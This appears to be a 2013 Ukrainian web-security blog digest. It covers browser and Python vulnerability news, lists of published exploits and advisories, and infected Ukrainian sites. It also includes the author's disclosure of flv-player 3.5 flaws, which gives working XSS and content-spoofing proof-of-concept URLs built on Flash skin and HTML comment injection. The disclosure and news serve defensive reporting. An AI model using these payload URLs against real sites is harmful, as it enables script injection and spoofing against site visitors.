Websecurity - Веб безпека

У жовтні, 01.10.2013, через півтора місяці після виходу Google Chrome 29, вийшов Google Chrome 30.

В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 19 уразливостей, 10 з яких позначені як небезпечні, а 6 як помірні. Загальна кількість дірок менша, зате кількість небезпечних дірок більша ніж у попередній версії браузера. А з врахуванням уразливостей знайдених під час внутрішнього аудиту, то це рекорд серед усіх релізів.

Уразливості, що мають статус небезпечних, пов’язані зі звертанням до вже звільненої області пам’яті в коді DOM, рендеринга inline-блоків, завантаження ресурсів, розбору XSLT і XML, реалізації PPAPI, діалозі вибору кольору на платформі Windows. Також усунуте пошкодження пам’яті в движку V8 і можливість підміни вмісту адресного рядка. Окремо згадується виправлення ще 27 уразливостей, виявлених у результаті внутрішнього аудиту, 17 з яких позначені як небезпечні.

• Выпуск web-браузера Chrome 30 (деталі)

Виявлена можливість обходу перевірки сертифіката в Python.

Уразливі версії: Python 2.7, Python 3.4.

Некоректна обробка NULL-символів.

• Vulnerability in Python (деталі)

В даній добірці експлоіти в веб додатках:

• Tenda W309R Router 5.07.46 - Configuration Disclosure (деталі)
• Asus RT-N66U 3.0.0.4.374_720 - CSRF Vulnerability (деталі)
• Western Digital Arkeia Remote Code Execution Vulnerability (деталі)
• freeFTPd 1.0.10 PASS Command SEH Overflow Vulnerability (деталі)
• GLPI install.php Remote Command Execution Vulnerability (деталі)

03.08.2013

У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в flv-player. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

08.10.2013

XSS (через Flash Injection) (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.

Content Spoofing (Flash Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf

Content Spoofing (Content Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg

Content Spoofing (HTML Injection) (WASC-12):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E

XSS (WASC-08):

http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E

В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.

Уразливі flv-player 3.5 та попередні версії.

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird та Seamonkey.

Уразливі продукти: Mozilla Firefox 23.0, Thunderbird 23.0, Seamonkey 2.20.

Пошкодження пам’яті, цілочислені переповнення, підвищення привілеїв, виконання коду, обхід захисту, витік інформації.

• Firefox for Android - Same-origin bypass through symbolic links (деталі)
• Mozilla Foundation Security Advisory 2013-76 (деталі)
• Mozilla Foundation Security Advisory 2013-77 (деталі)
• Mozilla Foundation Security Advisory 2013-78 (деталі)
• Mozilla Foundation Security Advisory 2013-79 (деталі)
• Mozilla Foundation Security Advisory 2013-80 (деталі)
• Mozilla Foundation Security Advisory 2013-81 (деталі)
• Mozilla Foundation Security Advisory 2013-82 (деталі)
• Mozilla Foundation Security Advisory 2013-83 (деталі)
• Mozilla Foundation Security Advisory 2013-84 (деталі)
• Mozilla Foundation Security Advisory 2013-85 (деталі)
• Mozilla Foundation Security Advisory 2013-86 (деталі)
• Mozilla Foundation Security Advisory 2013-87 (деталі)
• Mozilla Foundation Security Advisory 2013-88 (деталі)
• Mozilla Foundation Security Advisory 2013-89 (деталі)
• Mozilla Foundation Security Advisory 2013-90 (деталі)
• Mozilla Foundation Security Advisory 2013-91 (деталі)
• Mozilla Foundation Security Advisory 2013-92 (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://kharkivoda.gov.ua - інфікований державний сайт - інфекція була виявлена 14.08.2013. Зараз сайт не входить до переліку підозрілих.
• http://nokino.com.ua - інфекція була виявлена 15.09.2013. Зараз сайт не входить до переліку підозрілих.
• http://vanilin.com.ua - інфекція була виявлена 08.10.2013. Зараз сайт входить до переліку підозрілих.
• http://i.ua - інфекція була виявлена 08.10.2013. Зараз сайт не входить до переліку підозрілих.
• http://a-counter.com - інфекція була виявлена 09.10.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Varnish 2.1.5 DoS in STV_alloc() while parsing Content-Length header (деталі)
• Multiple vulnerabilities in phpMyAdmin (деталі)
• MojoPortal XSS (деталі)
• Multiple XSS Vulnerabilities in Jahia xCM (деталі)
• Varnish 2.1.5, 3.0.3 DoS in VRY_Create() while parsing Vary header (деталі)
• SQL Injection in Cotonti (деталі)
• vtiger CRM <= 5.4.0 (SOAP Services) Authentication Bypass Vulnerability (деталі)
• Samsung TV DoS (possible overflow) via SOAPACTION (деталі)
• vtiger CRM <= 5.4.0 (vtigerolservice.php) PHP Code Injection Vulnerability (деталі)
• vtiger CRM <= 5.4.0 (SOAP Services) Multiple SQL Injection Vulnerabilities (деталі)